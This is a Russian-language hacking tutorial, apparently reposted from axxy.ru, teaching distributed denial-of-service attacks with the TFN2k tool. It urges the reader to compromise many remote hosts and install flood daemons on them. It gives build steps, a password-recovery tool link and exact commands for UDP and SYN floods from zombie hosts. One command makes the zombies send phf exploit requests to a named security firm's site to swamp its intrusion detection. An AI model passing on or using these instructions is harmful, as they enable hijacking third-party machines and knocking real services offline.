я хочу рассказать тебе о Distributed Denial of Service
(распределенные атаки типа Отказ в Обслуживании), сокращенно DDOS. Ты
наверняка помнишь историю о заваленных серваках CNN, eBay, Yahoo...
Использовалась та самая DDOS атака, поставившая на колени эти гиганты
перед 16-летним парнем.
Схема атаки такова: Ты ломаешь как можно больше удаленных
хостов, устанавливаешь на них демоны DDOS, ждущие соединения, и спокойно,
сидя у себя дома, одной командой заставляешь их всех ринуться в бой
и заваливать нужную тебе жертву. Реакция последует немедленно. К тому
же можно спокойно спуфить свой IP'шник. И, естественно, чем больше у
тебя хостов, тем больше у тебя силы...
TFN2k
Tribe FloodNet. Написан Mixter'ом. Как утверждает автор,
эта прога быстродействующая и практически неуловимая. Действует по технологии
клиент/сервер. Ты на удаленных машинах с правами рута запускаешь сервер,
один, второй, третий, а клиентом коннектишься на эти серваки и отдаешь
команды, например, флудить www.nasa.gov. Но хватит теории, перейдем
к практике.
Разархивируй архив. Жми make. Тебя попросят ввести пароль. Все, первая
стадия завершена.
Итак, td - это собственно сервер. Запусти его на своей
машине, а потом клиентом (tfn) отдаешь приказ:
#./tfn -P tcp -h localhost -i www.ВРАГ.ru -c 4
Protocol: tcp
Source IP: random
Client input: single host
Command: stop flooding
Password verification: #тут вводишь свой пароль.
Что, пароль неверный? Тогда скачай tfnRECOVERY (http://packetstorm.widexs.nl/distributed/tfn2kpass.c)
компилируй ее, запускай
#./rec
и получи свой пароль. А мы пока проверим прогу в действии.
Сценарий 1
Итак, у тебя есть одна машина [A] с установленным tfn
серваком. И цель - [B]. Что мы делаем? Набираем команду:
./tfn -P tcp -h [A] -i [B] -c 4
Теперь мы флудим хост [B], через хост [A] (опция 4 - UDP
Flood), твой адрес по дефолту заспуфен, но его можно указать, используя
опцию -S .
Сценарий 2
У тебя есть несколько хостов с демоном tfn и все тот же
противный хост [B]. Записывай ip'шки в файл. Теперь набирай:
#./tfn -P tcp -f your_ip_file -i [B] -c 5
Теперь все хосты в твоем ip файле будут флудить хост [B]
SYN Flood'ом (опция 5).
Сценарий 3
Хост [B] молит о пощаде. Его нужно спасти:
#./tfn -P tcp -f your_ip_file -i [B] -c 0
Опция 0 означает отмену всяких флудов на хостах Zомби.
Прикол от Mixter'а с IDS:
./tfn -h your_ip_file -c 10 -i "echo 'GET /cgi-bin/phf?Qname=x%0A/bin/something\%20is%20wrong%20whis%20your%20IDS'
| telnet www.security-corporation.com 80"
Поясняю: опция 10 - выполнять хостам Zoмби какую-нибудь
команду. IDS - система обнаружения вторжений, и phf баг точно находится
в их базе; %20 - это пробел. Думаю, все понятно . Zoмби хосты будут
посылать эту команду на 80 порт бесконечно, пока не отключат или ВЫКЛЮЧАТ
, а IDS будет усиленно реагировать на это, засорять логи,
посылать SMS'ки и т.д.
Источник: axxy.ru
|